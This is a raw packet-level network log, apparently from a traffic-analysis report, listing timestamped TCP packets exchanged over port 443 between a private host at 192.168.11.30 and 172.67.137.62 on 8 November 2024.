                                                                                      Nov 8, 2024 10:47:21.087989092 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.087992907 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.088089943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.088089943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.088089943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.320405006 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.320648909 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.320650101 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.320661068 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.320831060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.320831060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.321217060 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.321387053 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.321392059 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.321546078 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.321552038 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.321600914 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.322199106 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.322309017 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.322367907 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.322372913 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.322508097 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.323138952 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.323301077 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.323307991 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.323365927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.323370934 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.323586941 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.324091911 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.324289083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.324743032 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.324904919 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.324923992 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.324925900 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.324933052 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.325068951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.325068951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.325119019 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.325894117 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.326059103 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.326108932 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.326575994 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.326770067 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.326771975 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.326776981 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.326916933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.326968908 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.327502012 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.327734947 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.327752113 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.327888966 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.327944040 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.576143980 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.576212883 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.576329947 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.576350927 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.576679945 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.576689959 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.577938080 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.577958107 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.578031063 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.578161955 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578174114 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.578212023 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578212023 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578217983 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.578258038 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578309059 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578309059 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578309059 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578336000 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.578355074 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578358889 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.578406096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578406096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578406096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578454018 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578552008 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578552008 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578558922 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.578603029 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578649044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578705072 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578705072 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578705072 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578705072 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578749895 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.578799009 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.628025055 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.812680006 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.812691927 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.812750101 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.812793970 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.812853098 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.812853098 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.812994957 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.812994957 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813009024 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.813021898 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.813060045 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.813095093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813095093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813194036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813194036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813205957 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.813218117 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813288927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813288927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.813288927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.814810991 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.814821005 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.815001011 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.815001011 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.815011024 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.815017939 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.815099001 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.815099001 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.815172911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.816700935 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.816710949 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.816880941 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.816880941 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.816891909 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.816939116 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.816953897 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.816953897 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.817029953 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.818348885 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.818360090 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.818512917 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.818512917 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.818530083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.818605900 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.818605900 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.818615913 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.818628073 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.819915056 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.819968939 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.820080042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.820080042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.820090055 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.820139885 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.820264101 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.821748972 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.821758032 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.821928978 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.821928978 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.821983099 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.821991920 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.821999073 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.822077036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.822185040 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.823170900 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.823276043 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.823357105 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.823409081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.823419094 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:21.823468924 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:21.877924919 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.054526091 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.054539919 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.054738045 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.054738045 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.054752111 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.054797888 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.054797888 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.054918051 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.056370974 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.056381941 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.056448936 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.056636095 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.056636095 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.056646109 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.056653976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.056761026 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.056865931 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.058907986 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.058917999 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.059094906 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.059154987 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.059154987 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.059165001 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.059171915 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.059339046 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.062549114 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.062558889 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.062738895 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.062738895 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.062793970 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.062803984 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.062814951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.062814951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.062990904 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.077809095 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.077822924 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.077991009 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.078084946 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078135014 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.078136921 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078228951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078238964 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.078285933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078351021 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078351021 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078444004 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078444004 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078461885 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078587055 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.078593969 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078607082 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.078627110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078633070 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.078758955 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078758955 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078773022 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.078783035 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078860998 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078860998 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078912973 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.078924894 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.079008102 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.079008102 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.079015970 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.079108953 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.079108953 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.079205036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.079205036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.299917936 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.300021887 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.300226927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.300246954 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305114985 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305129051 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305190086 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305247068 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305264950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305264950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305277109 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305362940 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305432081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305432081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305526972 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305526972 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305573940 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305624008 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305630922 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305672884 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305721998 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305773020 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305773020 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305778980 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.305869102 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305917025 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.305965900 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.306065083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.306145906 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.307492971 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.307507038 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.307719946 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.307725906 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.307876110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.308821917 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.308931112 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.308994055 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.308994055 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.309041023 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.309046030 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.309091091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.310595989 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.310607910 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.310735941 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.310735941 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.310743093 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.310780048 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.310902119 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.312282085 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.312299013 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.312427044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.312427044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.312567949 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.312572956 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.314757109 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.314780951 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.314897060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.314897060 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.314903975 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.314940929 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.315051079 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.316354036 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.316368103 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.316520929 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.316520929 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.316529036 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.316565990 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.316663980 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.319381952 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.319396973 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.319524050 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.319653988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.319653988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.319660902 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.320981026 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.321090937 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.321125031 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.321125031 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.321130991 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.321219921 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.321265936 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.542417049 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.542525053 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.542593956 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.542593956 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.542651892 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.542663097 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.542829990 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.544429064 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.544439077 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.544624090 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.544624090 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.544666052 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.544675112 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.544722080 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.544722080 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.544845104 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:22.546199083 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:22.546209097 CET44349777172.67.137.62192.168.11.30
